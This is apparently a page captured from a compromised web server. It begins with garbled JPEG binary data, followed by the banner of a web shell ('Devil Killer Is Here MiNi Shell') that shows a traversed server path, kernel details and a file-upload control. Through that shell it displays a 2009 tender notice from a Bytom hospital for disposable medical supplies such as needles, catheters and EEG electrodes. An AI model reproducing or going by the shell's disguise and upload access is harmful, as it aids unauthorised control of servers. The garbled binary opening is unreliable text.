JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090702/103983-N-2009.html

<p class="kh_header"><b>Bytom: Przetarg nieograniczony na zakup wraz z dostawą sprzętu medycznego jednorazowego użytku dla potrzeb własnych Szpitala Specjalistycznego Nr 2 w Bytomiu.</b><br>
<b>Numer ogłoszenia: 103983 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 032 7861400, faks 032 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital2.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na zakup wraz z dostawą sprzętu medycznego jednorazowego użytku dla potrzeb własnych Szpitala Specjalistycznego Nr 2 w Bytomiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w przetargu nieograniczonym jest dostawa sprzętu medycznego jednorazowego  użytku określonego  przez Zamawiającego według grup asortymentowo                - cenowych  zgrupowanych  w  Pakietach nr 1 - 110 stanowiących załącznik A                            do specyfikacji istotnych warunków zamówienia :

Pakiet 1	Igły  do punkcji 
Pakiet 2	Cewniki - zestawy do wenesekcji
Pakiet 3	Cewniki,  dreny, zgłębniki 
Pakiet 4	Cewniki
Pakiet 5	Elektroda  do  aparatu  IFA
Pakiet 6	Zestawy do termoablacji
Pakiet 7	Fartuch wielorazowego użytku
Pakiet 8	Kolby, zlewki
Pakiet 9	Probówki - kuwety do fotometru Pointe 180
Pakiet 10	Zestaw do utylizacji rtęci
Pakiet 11	Elektrody do EEG  
Pakiet 12	Aparaty do pomp infuzyjnych przepływowych typu AMEDA.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.14.12.00-2, 33.14.16.41-5, 33.14.16.40-8, 33.14.16.00-6, 33.15.82.00-4, 33.14.16.20-2, 33.19.90.00-0, 33.14.10.00-0, 24.10.00.00-5, 33.10.00.00-0, 33.19.41.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium:
	w przypadku złożenia oferty na wszystkie pakiety wadium w wysokości 1657,20 zł. (słownie: jeden tysiąc sześćset pięćdziesiąt siedem złotych i 20/100),
	w przypadku złożenia oferty na pakiet nr 1  wadium w wysokości 72,00  zł                        ( słownie : siedemdziesiąt dwa złote ),
	w przypadku złożenia oferty na pakiet nr 2 wadium w wysokości 42,00 zł                            ( słownie : czterdzieści dwa  złotych ).
	w przypadku złożenia oferty na pakiet nr 3 wadium w wysokości 1190,00 zł                           ( słownie : jeden tysiąc sto dziewięćdziesiąt  złotych ),
	w przypadku złożenia oferty na pakiet nr 4 wadium w wysokości 31,00 zł                                    ( słownie : trzydzieści jeden złotych ),
	w przypadku złożenia oferty na pakiet nr 5  wadium w wysokości 2,50 zł                             ( słownie : dwa złote i 50/100 ),
	w przypadku złożenia oferty na pakiet nr 6  wadium w wysokości 60,00 zł                           ( słownie : sześdziesiąt złotych ),
	w przypadku złożenia oferty na pakiet nr 7  wadium w wysokości 43,00 zł                             ( słownie : czterdzieści trzy  złote ),
	w przypadku złożenia oferty na pakiet nr 8  wadium w wysokości 17,00 zł                                ( słownie : siedemnaście  złotych ),
	w przypadku złożenia oferty na pakiet nr 9  wadium w wysokości 0,70 zł                           ( słownie : siedemdziesiąt groszy ),
	w przypadku złożenia oferty na pakiet nr 10  wadium w wysokości 12,00 zł                             ( słownie : dwanaście  złotych ),
	w przypadku złożenia oferty na pakiet nr 11  wadium w wysokości 77,00 zł                          ( słownie : siedemdziesiąt siedem złotych ),
	w przypadku złożenia oferty na pakiet nr 12  wadium w wysokości 110,00 zł                             ( słownie : sto dziesięć złotych ),<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone                                  w art. 22 ustawy - prawo zamówień publicznych  tzn. że:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności                  (art. 22 ust 1 pkt 1 pzp), tj.: są uprawnieni do występowania w obrocie prawnym                           i prowadzą działalność w zakresie objętym niniejszym zamówieniem, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 1 SIWZ
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (art. 22 ust 1 pkt 2 pzp) .tj.: zrealizowali min. 2 dostawy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia. Za jedną dostawę spełniającą powyższe wymogi                               ( odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia ) Zamawiający uzna dostawę wyrobów medycznych, na kwotę nie mniejszą niż wartość brutto złożonej oferty każda, zapewni termin dostawy przedmiotu zamówienia nie dłuższy niż 5 dni roboczych  po dokonaniu zamówienia przez upoważnionego pracownika Zamawiającego                              - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 2 SIWZ
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust 1 pkt 3 pzp), tj. posiadają dostęp do wolnych środków finansowych lub zdolność kredytową w wysokości co najmniej takiej, jak wartość złożonej oferty, zapewnią stałość cen w okresie trwania umowy, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 3  SIWZ
d)	nie podlegają wykluczeniu na podstawie art. 22 ust 1 pkt 4 pzp - Wykonawca składa dokumenty określone w § 18 ust. 1 SIWZ oraz oświadczenie będące załącznikiem nr 3  do SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że Wykonawca ubiegający się o zamówienie publiczne posiada uprawnienia do wykonywania działalności będącej przedmiotem zamówienia oraz , że nie podlega wykluczeniu na podstawie art.24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający wymaga :
a)	Aktualny - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - oryginał lub kopia poświadczona za zgodność z oryginałem przez podmiot upoważniony do reprezentowania Wykonawcy.
b)	W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu o którym mowa w pkt  a, aktualny dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości  lub jeśli w kraju pochodzenia osoby                  lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania nie wydaje się                  ww dokumentu - dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
c)	Aktualne - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert -  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - oryginał lub kopia poświadczona za zgodność z oryginałem przez podmiot upoważniony do reprezentowania Wykonawcy.
d)	W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu o którym mowa  w pkt c,  aktualne  dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu lub jeśli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania nie wydaje się ww dokumentu - dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
2.	W celu potwierdzenia niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Zamawiający wymaga :
a)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wg wzoru stanowiącego załącznik nr 5 do SIWZ ( Doświadczenie zawodowe )
b)	Dokumenty (np. referencje lub protokoły ) poprzednich zamawiających potwierdzające,                      że dostawy  te zostały wykonane należycie 
c)	Oświadczenie dotyczące terminu dostawy  wg wzoru stanowiącego załącznik nr 6 do SIWZ
3.	W celu potwierdzenia , że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający wymaga :
a)	Oświadczenie o stałości cen oraz warunkach płatności wg wzoru stanowiącego załącznik                 nr 4 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpitalspec2.bytom.ids.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny numer 2 w Bytomiu ul. St Batorego 15 blok 2 pok 22 w cenie 24,40 zł lub bezpłatnie internetowej Szpitala . www.szpitalspec2.bytom.ids.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2009 godzina 09:00, miejsce: Szpital Specjalistyczny numer 2 w Bytomiu ul. St Batorego 15 blok 2 pok 2 - Kancelaria Główna.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 12.08.2009.</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1  - IGŁY  DO PUNKCJI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Igła do punkcji lędźwiowych 20 G x 3 1/2 rozmiar 0,9 x 90 mm sterylna z ostrzem Quincke			10	szt.
2.	Igła do wkłuć lędźwiowych 19 G x 3 1/2rozmiar 1,1 x 90 mm  sterylna z ostrzem Quincke			100	szt.
3.	Igła do wkłuć lędźwiowych 18 G x 3 1/2 rozmiar 1,2 x 90 mm  sterylna z ostrzem Quincke			120	szt.
4.	Igła do wkłuć lędźwiowych 22 G x 3 1/2 rozmiar 0,7 x 90 mm sterylna z ostrzem Quincke 			60	szt.
5.	Igła do punkcji lędźwiowych typu Yale  22 G x 7   rozmiar  0,7 x 178 - 200 mm sterylna z krótkim, ściętym ostrzem typu Quincke 			80	szt.
6.	Igła do punkcji lędźwiowych 22 G x 1 1/2 rozmiar  0,7 x 35-40 mm sterylna z krótkim, ściętym ostrzem typu Quincke 			160	szt.
7.	Igła do punkcji lędźwiowych 22 G x 2 1/2  rozmiar 0,7 x 63 - 65  mm sterylna z krótkim, ściętym ostrzem typu Quincke 			60	szt.
8.	Igła do punkcji lędźwiowych 22  G x 3 rozmiar 0,9 x 75-76 mm sterylna z krótkim, ściętym ostrzem typu Quincke 			10	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - CEWNIKI - ZESTAWY DO WENESEKCJI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewnik epidularny do wenesekcji w rozmiarze od Ch16 do Ch 20 (przeznaczone dla chorych u których wystąpił całkowity brak mozliwości wkłucia żylnego oraz przy reanimacji )			30	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3- CEWNIKI,  DRENY, ZGŁĘBNIKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cewnik Nelaton od Ch 6 do Ch 22 długość 360-400 mm, sterylny			1 500	szt.
2.	Cewnik do podawania tlenu przez nos (wąsy) dla dorosłych,  jednorazowego użytku, jałowy lub mikrobiologicznie czysty o dł. min 175 cm			5 000	szt.
3.	Cewnik do podawania tlenu przez nos (wąsy) dziecięcy, jednorazowego użytku, jałowy lub mikrobiologicznie czysty o dł. min 175 cm			300	szt.
4	Cewnik do odsysania górnych dróg oddechowych typ B z 2 otworami bocznymi i centralnym od Ch 4 do Ch 10 o długości ok.: Ch 4 -  350-400 mm, Ch 6 - 400 mm,  Ch 8 -  400 mm, Ch 10 -  400 mm     			12 000	szt.
5	Cewnik do odsysania górnych dróg oddechowych typ B  z 2 otworami bocznymi i centralnym od Ch 12 do Ch 16 o długości ok.: Ch 12 -  500/600 mm, Ch 14 - 600 mm, Ch 16 - 600 mm.  			3 500	szt.
6	Cewnik Foleya Ch  6  długość standardowa silikonowane, sterylne z prowadnicą ułatwiającą wprowadzanie			18	szt.
7	Cewnik Foleya Ch  8 długość standardowa silikonowane, sterylne z prowadnicą ułatwiającą wprowadzanie			100	szt.
8	Cewnik Foleya Ch 10 długość standardowa silikonowane, sterylne z prowadnicą ułatwiającą wprowadzanie			30	szt.
9	Cewnik Foleya Ch 12 do Ch 24  długość standardowa silikonowane, sterylne 			5 500	szt.
10	Cewnik Pezzera Ch 18 do Ch 36 długość standardowa z lateksu, sterylne			1 300	szt.
11	Dren Kehra Ch 16 do Ch 22 dł. ramienia 760 x 300 mm z lateksu lub silikonu, sterylne			450	szt.
12	Dren Kehra Ch 12 do Ch 14  z lateksu lub silikonu, sterylne			7	szt.
13	Przewód do cystoskopii i rektoskopii pojedynczy (sterylny) 			12	szt.
14	Zgłębniki żołądkowe od Ch 8 do Ch 20, długość 800 mm sterylny			250	szt.
15	Zgłębniki żołądkowe od Ch 8 do Ch 20, długość 1000 mm sterylny			1 100	szt.
16	Zgłębniki żołądkowe od Ch 12 do Ch 20, długość 1200 do 1250 mm sterylny			800	szt.
17	Zgłębniki żołądkowe od Ch 36, długość 3000 mm niesterylny			25	szt.
18	Zgłębniki żołądkowe od Ch 32 DO Ch 36, długość 1500 mm niesterylny			50	szt.
19	Cewnik do karmienia przez nos z zamknięciem luer -lock Ch 4 do Ch 8, sterylne, oznakowane co 1 cm. lub posiadające znaczniki głębokości  dł.400 mm - 750 mm. Łagodnie zaokrąglona , zamknięta końcówka , dwa boczne otwory o gładkich krawędziach , łącznik z zatyczką , z paskami kontrastującymi w RTG.			5 500	szt.
20	Cewnik do karmienia przez nos z zamknięciem Ch 10 do Ch 18, sterylne			3 800	szt.
21	Sonda Sengstakena Ch 18 do Ch 21 sterylna 			17	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.16.41-5, 33.14.16.40-8, 33.14.16.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - CEWNIKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cewnik do odsysania górnych dróg oddechowych  typ A  z 1 otworem centralnym  - Ch 4 do Ch 10  długość  od 350-450 mm			2 000	szt.
2	Cewnik do odsysania górnych dróg oddechowych  typ A  z 1 otworem centralnym  - Ch 12 do Ch14 długość 400-500 mm			950	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.16.41-5, 33.14.16.40-8, 33.14.16.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5  - ELEKTRODA  DO  APARATU  IFA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektroda silikonowa  do aparatu  elektroterapeutycznego  IFA 3  
rozmiar 6 x 12 cm, 12 x 6 cm			6	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6- ZESTAWY DO TERMOABLACJI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do termoablacji, jednorazowy, sterylny typu Therma Choice ( kateter z balonem do termoablacji )			3	zest..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 7- FATRUCH WIELORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Fartuch chirurgiczny wielokrotnego użytku. Część przednia oraz przedramiona fartucha narażone na bezpośredni kontakt  z polem operacyjnym wykonane  z podwójnej warstwy niepylącej tkaniny poliestrowej o gramaturze do 110 g / m 2 , Fartuchy z możliwością sterylizacji parowej w temp 134 stopni C. Wytrzymałość minimum 100 cykli sterylizacji.Bez potrzeby teflonowania i impregnacji 			12	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 8 - KOLBY, ZLEWKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kolba Erlenmajera z wąską szyjką  o poj. 1000 ml			10	szt.
2.	Kolba Erlenmajera z wąską szyjką o poj. 250 - 300 ml			10	szt.
3.	Kolba Erlenmajera z wąską szyjką o poj. 200 ml			6	szt.
4.	Zlewki laboratoryjne, o poj.  od 250 - 400 ml, wysokie			6	szt.
5.	Bagietki szklane z obtopionymi końcami , krótkie .			200	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet Nr 9 -  PROBÓWKI - KUWETY DO FOTOMETRU POINTE 180.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Probówki-kuwety do fotometru POINTE 180			100	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 10 - ZESTAW DO UTYLIZACJI RTĘCI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw do utylizacji rtęci			2	zest..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 11  - ELEKTRODY DO  EEG.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czepek elektrodowy do EEG  z elektrodami umocowanymi do czepka dla dorosłych       ( 55 - 59 cm ) 			2	szt
2.	Czepek elektrodowy do EEG  z elektrodami umocowanymi do czepka dla dzieci          ( 51 - 55 cm ) 			2	szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</li>
